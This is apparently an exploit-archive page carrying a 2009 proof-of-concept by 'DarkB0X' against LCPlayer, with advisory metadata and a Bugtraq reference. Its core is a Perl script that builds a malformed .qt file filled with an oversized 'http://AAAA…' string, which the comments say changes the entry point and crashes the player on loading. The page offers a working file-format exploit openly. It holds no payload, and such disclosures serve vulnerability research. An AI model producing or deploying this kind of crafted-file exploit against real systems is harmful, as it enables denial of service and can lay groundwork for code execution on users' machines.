LCPlayer (.qt file) EOP change PoC (app crash)

2009.02.05
Credit: DarkB0X
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

#!/usr/bin/perl -w #By DarkB0X #HomePage : http://NullArea.Net #contact : darkb0x97_at_googlemail.com #after loading the file click on it in the program #entry point will change and the app will crash my $file = "dark.qt" ; my $poc="http://"."A" x 0265487 ; open(b0x, ">>$file") or die "Cannot open $file"; print b0x $poc; close(b0x); print "\n[+] done ! , $file created";

References:

http://seclists.org/bugtraq/2009/Feb/0032.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top